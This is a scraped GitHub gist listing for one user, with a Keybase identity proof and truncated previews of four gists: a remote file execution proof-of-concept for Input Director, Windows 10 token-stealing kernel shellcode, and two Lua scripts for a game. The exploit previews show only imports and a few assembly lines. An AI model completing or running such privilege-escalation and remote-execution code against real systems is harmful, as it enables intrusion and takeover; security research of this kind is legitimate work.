I hereby claim:
- I am keramas on github.
- I am keramas (https://keybase.io/keramas) on keybase.
- I have a public key ASBABBngpumLpMHLaA4JUAfny7bpR89FF1Z-kXvHXERrhQo
To claim this, I am signing this object:
Devin Casadey Keramas
Keramas
/ iamthedirectornow.py
Last active
July 28, 2020 08:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Scanner and remote file execution proof-of-concept for password-less instances of Input Director. | |
| from pwn import * | |
| import threading | |
| import concurrent.futures | |
| import time | |
| import queue | |
| import sys | |
| from scapy.all import * | |
| import argparse |
Keramas
/ Windows10_x64_2004_TokenStealingShellcode.asm
Last active
June 21, 2020 09:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Windows 10 x64 2004 Token Stealing Payload | |
| ; Updated for change in EPROCESS structure offsets | |
| [BITS 64] | |
| _start: | |
| xor rax, rax | |
| mov rax, [gs:0x188] ; Current thread (_KTHREAD) | |
| mov rax, [rax + 0xb8] ; Current process (_EPROCESS) | |
| mov r8, rax ; Copy current process (_EPROCESS) to r8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ------------------------------------------------------------------------------------------------------------------- | |
| -- Setup functions for this job. Generally should not be modified. | |
| ------------------------------------------------------------------------------------------------------------------- | |
| -- Initialization function for this job file. | |
| function get_sets() | |
| mote_include_version = 2 | |
| -- Load and initialize the include file. | |
| include('Mote-Include.lua') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ------------------------------------------------------------------------------------------------------------------- | |
| -- Setup functions for this job. Generally should not be modified. | |
| ------------------------------------------------------------------------------------------------------------------- | |
| --[[ | |
| gs c toggle LuzafRing -- Toggles use of Luzaf Ring on and off | |
| Offense mode is melee or ranged. Used ranged offense mode if you are engaged | |
| for ranged weaponskills, but not actually meleeing. | |